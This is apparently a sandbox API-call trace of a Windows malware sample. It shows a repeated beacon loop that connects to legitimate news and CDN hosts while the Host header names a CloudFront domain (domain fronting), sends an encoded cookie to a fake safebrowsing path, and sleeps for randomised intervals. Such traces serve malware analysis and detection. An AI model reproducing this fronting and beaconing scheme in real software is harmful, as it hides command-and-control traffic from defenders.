[0154.159] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0154.853] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0154.853] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0154.853] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0154.853] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x13, wMilliseconds=0xad))
[0154.854] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0154.854] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0154.854] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x13, wMilliseconds=0xad))
[0154.854] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383d70) returned 1
[0154.855] CryptGenRandom (in: hProv=0x383d70, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0154.855] CryptReleaseContext (hProv=0x383d70, dwFlags=0x0) returned 1
[0154.855] Sleep (dwMilliseconds=0x2f49)
[0164.860] GetLastError () returned 0x0
[0164.860] SetLastError (dwErrCode=0x0)
[0164.860] GetLastError () returned 0x0
[0164.860] SetLastError (dwErrCode=0x0)
[0164.860] GetLastError () returned 0x0
[0164.860] SetLastError (dwErrCode=0x0)
[0164.861] GetLastError () returned 0x0
[0164.861] SetLastError (dwErrCode=0x0)
[0164.861] GetLastError () returned 0x0
[0164.861] SetLastError (dwErrCode=0x0)
[0164.861] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0164.861] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0164.861] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0164.861] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0164.861] GetLastError () returned 0x0
[0164.861] SetLastError (dwErrCode=0x0)
[0164.861] htonl (hostlong=0xa000000) returned 0xa
[0164.862] htonl (hostlong=0x22000000) returned 0x22
[0164.862] GetLastError () returned 0x0
[0164.862] SetLastError (dwErrCode=0x0)
[0164.862] htonl (hostlong=0xa000000) returned 0xa
[0164.862] htonl (hostlong=0x47000000) returned 0x47
[0164.862] GetLastError () returned 0x0
[0164.862] SetLastError (dwErrCode=0x0)
[0164.862] htonl (hostlong=0xa000000) returned 0xa
[0164.862] htonl (hostlong=0x1f000000) returned 0x1f
[0164.862] GetLastError () returned 0x0
[0164.862] SetLastError (dwErrCode=0x0)
[0164.862] htonl (hostlong=0x7000000) returned 0x7
[0164.862] htonl (hostlong=0x0) returned 0x0
[0164.862] htonl (hostlong=0x8000000) returned 0x8
[0164.862] htonl (hostlong=0x2000000) returned 0x2
[0164.862] htonl (hostlong=0x8000000) returned 0x8
[0164.862] htonl (hostlong=0x6000000) returned 0x6
[0164.862] htonl (hostlong=0x6000000) returned 0x6
[0164.862] GetLastError () returned 0x0
[0164.862] SetLastError (dwErrCode=0x0)
[0164.862] htonl (hostlong=0x0) returned 0x0
[0164.862] GetLastError () returned 0x0
[0164.862] SetLastError (dwErrCode=0x0)
[0164.862] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0164.862] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0164.862] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0164.862] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0165.580] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0165.580] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0165.581] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0165.581] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x1d, wMilliseconds=0x38a))
[0165.581] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0165.581] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0165.581] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x1d, wMilliseconds=0x38a))
[0165.581] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3834f0) returned 1
[0165.582] CryptGenRandom (in: hProv=0x3834f0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0165.582] CryptReleaseContext (hProv=0x3834f0, dwFlags=0x0) returned 1
[0165.582] Sleep (dwMilliseconds=0x30d4)
[0175.590] GetLastError () returned 0x0
[0175.590] SetLastError (dwErrCode=0x0)
[0175.590] GetLastError () returned 0x0
[0175.590] SetLastError (dwErrCode=0x0)
[0175.590] GetLastError () returned 0x0
[0175.590] SetLastError (dwErrCode=0x0)
[0175.590] GetLastError () returned 0x0
[0175.590] SetLastError (dwErrCode=0x0)
[0175.590] GetLastError () returned 0x0
[0175.590] SetLastError (dwErrCode=0x0)
[0175.590] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0175.590] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0175.591] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0175.591] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0175.591] GetLastError () returned 0x0
[0175.591] SetLastError (dwErrCode=0x0)
[0175.591] htonl (hostlong=0xa000000) returned 0xa
[0175.591] htonl (hostlong=0x22000000) returned 0x22
[0175.591] GetLastError () returned 0x0
[0175.591] SetLastError (dwErrCode=0x0)
[0175.591] htonl (hostlong=0xa000000) returned 0xa
[0175.591] htonl (hostlong=0x47000000) returned 0x47
[0175.591] GetLastError () returned 0x0
[0175.591] SetLastError (dwErrCode=0x0)
[0175.591] htonl (hostlong=0xa000000) returned 0xa
[0175.591] htonl (hostlong=0x1f000000) returned 0x1f
[0175.591] GetLastError () returned 0x0
[0175.591] SetLastError (dwErrCode=0x0)
[0175.591] htonl (hostlong=0x7000000) returned 0x7
[0175.591] htonl (hostlong=0x0) returned 0x0
[0175.591] htonl (hostlong=0x8000000) returned 0x8
[0175.591] htonl (hostlong=0x2000000) returned 0x2
[0175.591] htonl (hostlong=0x8000000) returned 0x8
[0175.591] htonl (hostlong=0x6000000) returned 0x6
[0175.591] htonl (hostlong=0x6000000) returned 0x6
[0175.591] GetLastError () returned 0x0
[0175.591] SetLastError (dwErrCode=0x0)
[0175.591] htonl (hostlong=0x0) returned 0x0
[0175.591] GetLastError () returned 0x0
[0175.591] SetLastError (dwErrCode=0x0)
[0175.591] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0175.591] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0175.591] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0175.591] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0176.611] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0176.611] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0176.611] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0176.611] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x28, wMilliseconds=0x3a6))
[0176.611] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0176.611] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0176.611] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x28, wMilliseconds=0x3a6))
[0176.611] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383d70) returned 1
[0176.612] CryptGenRandom (in: hProv=0x383d70, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0176.612] CryptReleaseContext (hProv=0x383d70, dwFlags=0x0) returned 1
[0176.612] Sleep (dwMilliseconds=0x32f0)
[0186.628] GetLastError () returned 0x0
[0186.628] SetLastError (dwErrCode=0x0)
[0186.628] GetLastError () returned 0x0
[0186.628] SetLastError (dwErrCode=0x0)
[0186.628] GetLastError () returned 0x0
[0186.628] SetLastError (dwErrCode=0x0)
[0186.629] GetLastError () returned 0x0
[0186.629] SetLastError (dwErrCode=0x0)
[0186.629] GetLastError () returned 0x0
[0186.629] SetLastError (dwErrCode=0x0)
[0186.629] GetLastError () returned 0x0
[0186.629] SetLastError (dwErrCode=0x0)
[0186.629] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0186.629] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0186.629] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0186.629] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0186.629] GetLastError () returned 0x0
[0186.629] SetLastError (dwErrCode=0x0)
[0186.629] htonl (hostlong=0xa000000) returned 0xa
[0186.629] htonl (hostlong=0x22000000) returned 0x22
[0186.629] GetLastError () returned 0x0
[0186.629] SetLastError (dwErrCode=0x0)
[0186.629] htonl (hostlong=0xa000000) returned 0xa
[0186.629] htonl (hostlong=0x47000000) returned 0x47
[0186.630] GetLastError () returned 0x0
[0186.630] SetLastError (dwErrCode=0x0)
[0186.630] htonl (hostlong=0xa000000) returned 0xa
[0186.630] htonl (hostlong=0x1f000000) returned 0x1f
[0186.630] GetLastError () returned 0x0
[0186.630] SetLastError (dwErrCode=0x0)
[0186.630] htonl (hostlong=0x7000000) returned 0x7
[0186.630] htonl (hostlong=0x0) returned 0x0
[0186.630] htonl (hostlong=0x8000000) returned 0x8
[0186.630] htonl (hostlong=0x2000000) returned 0x2
[0186.630] htonl (hostlong=0x8000000) returned 0x8
[0186.630] htonl (hostlong=0x6000000) returned 0x6
[0186.630] htonl (hostlong=0x6000000) returned 0x6
[0186.630] GetLastError () returned 0x0
[0186.630] SetLastError (dwErrCode=0x0)
[0186.630] htonl (hostlong=0x0) returned 0x0
[0186.630] GetLastError () returned 0x0
[0186.630] SetLastError (dwErrCode=0x0)
[0186.630] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0186.630] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0186.630] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0186.630] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0187.336] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0187.336] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0187.337] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0187.337] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x33, wMilliseconds=0x28d))
[0187.337] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0187.337] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0187.337] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x1f, wSecond=0x33, wMilliseconds=0x28d))
[0187.337] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383b50) returned 1
[0187.338] CryptGenRandom (in: hProv=0x383b50, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0187.338] CryptReleaseContext (hProv=0x383b50, dwFlags=0x0) returned 1
[0187.338] Sleep (dwMilliseconds=0x3239)
[0197.351] GetLastError () returned 0x0
[0197.351] SetLastError (dwErrCode=0x0)
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0197.352] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0197.352] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0197.352] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] htonl (hostlong=0xa000000) returned 0xa
[0197.352] htonl (hostlong=0x22000000) returned 0x22
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] htonl (hostlong=0xa000000) returned 0xa
[0197.352] htonl (hostlong=0x47000000) returned 0x47
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] htonl (hostlong=0xa000000) returned 0xa
[0197.352] htonl (hostlong=0x1f000000) returned 0x1f
[0197.352] GetLastError () returned 0x0
[0197.352] SetLastError (dwErrCode=0x0)
[0197.352] htonl (hostlong=0x7000000) returned 0x7
[0197.352] htonl (hostlong=0x0) returned 0x0
[0197.353] htonl (hostlong=0x8000000) returned 0x8
[0197.353] htonl (hostlong=0x2000000) returned 0x2
[0197.353] htonl (hostlong=0x8000000) returned 0x8
[0197.353] htonl (hostlong=0x6000000) returned 0x6
[0197.353] htonl (hostlong=0x6000000) returned 0x6
[0197.353] GetLastError () returned 0x0
[0197.354] SetLastError (dwErrCode=0x0)
[0197.354] htonl (hostlong=0x0) returned 0x0
[0197.354] GetLastError () returned 0x0
[0197.354] SetLastError (dwErrCode=0x0)
[0197.354] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0197.354] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0197.354] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0197.354] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0198.057] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0198.057] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0198.057] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0198.057] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x2, wMilliseconds=0x17e))
[0198.057] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0198.057] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0198.057] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0x2, wMilliseconds=0x17e))
[0198.057] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383f90) returned 1
[0198.057] CryptGenRandom (in: hProv=0x383f90, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0198.057] CryptReleaseContext (hProv=0x383f90, dwFlags=0x0) returned 1
[0198.057] Sleep (dwMilliseconds=0x3273)
[0208.062] GetLastError () returned 0x0
[0208.062] SetLastError (dwErrCode=0x0)
[0208.062] GetLastError () returned 0x0
[0208.062] SetLastError (dwErrCode=0x0)
[0208.062] GetLastError () returned 0x0
[0208.062] SetLastError (dwErrCode=0x0)
[0208.062] GetLastError () returned 0x0
[0208.062] SetLastError (dwErrCode=0x0)
[0208.062] GetLastError () returned 0x0
[0208.062] SetLastError (dwErrCode=0x0)
[0208.062] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0208.062] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0208.062] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0208.062] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0208.063] GetLastError () returned 0x0
[0208.063] SetLastError (dwErrCode=0x0)
[0208.063] htonl (hostlong=0xa000000) returned 0xa
[0208.063] htonl (hostlong=0x22000000) returned 0x22
[0208.063] GetLastError () returned 0x0
[0208.063] SetLastError (dwErrCode=0x0)
[0208.063] htonl (hostlong=0xa000000) returned 0xa
[0208.063] htonl (hostlong=0x47000000) returned 0x47
[0208.063] GetLastError () returned 0x0
[0208.063] SetLastError (dwErrCode=0x0)
[0208.063] htonl (hostlong=0xa000000) returned 0xa
[0208.063] htonl (hostlong=0x1f000000) returned 0x1f
[0208.063] GetLastError () returned 0x0
[0208.063] SetLastError (dwErrCode=0x0)
[0208.063] htonl (hostlong=0x7000000) returned 0x7
[0208.063] htonl (hostlong=0x0) returned 0x0
[0208.063] htonl (hostlong=0x8000000) returned 0x8
[0208.063] htonl (hostlong=0x2000000) returned 0x2
[0208.063] htonl (hostlong=0x8000000) returned 0x8
[0208.063] htonl (hostlong=0x6000000) returned 0x6
[0208.063] htonl (hostlong=0x6000000) returned 0x6
[0208.063] GetLastError () returned 0x0
[0208.063] SetLastError (dwErrCode=0x0)
[0208.063] htonl (hostlong=0x0) returned 0x0
[0208.063] GetLastError () returned 0x0
[0208.063] SetLastError (dwErrCode=0x0)
[0208.063] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0208.063] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0208.063] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0208.063] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0208.814] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0208.814] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0208.814] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0208.815] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x20, wSecond=0xd, wMilliseconds=0x8a))
[0208.815] InternetCloseHandle (hInternet=0xcc0008) returned 1
